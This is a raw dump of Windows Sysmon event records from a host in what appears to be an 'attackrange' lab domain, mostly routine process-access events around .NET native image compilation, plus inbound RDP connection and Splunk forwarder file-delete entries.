Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.123{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF7-607E-CB0D-00000000BB01}5648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.107{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.107{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}5648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000076572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.888{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54386-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000076571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.786{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57111-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000076570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.045{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF7-607E-CA0D-00000000BB01}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.029{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.029{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.982{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF6-607E-C90D-00000000BB01}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.967{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.967{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.936{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF6-607E-C80D-00000000BB01}2076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.920{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.920{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}2076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.842{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF6-607E-C70D-00000000BB01}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.826{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.826{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.795{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF6-607E-C60D-00000000BB01}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.779{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.779{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.748{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF6-607E-C50D-00000000BB01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.732{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.732{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.701{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A67918D1A0DF6915AAEEADAED727CFFC,SHA256=93A29BAAAFAB15CA9F80FB5C262A20ACD2F4DE066ED1E87DF8516C9B1E7A77A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000076551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.701{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=64AEED0F584F82AA64C5258A6FB91337,SHA256=A7972047E1FFC3A3AF66FBA64B557EDB9AF5507BF58EE4EA22F508D8B3B3316F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 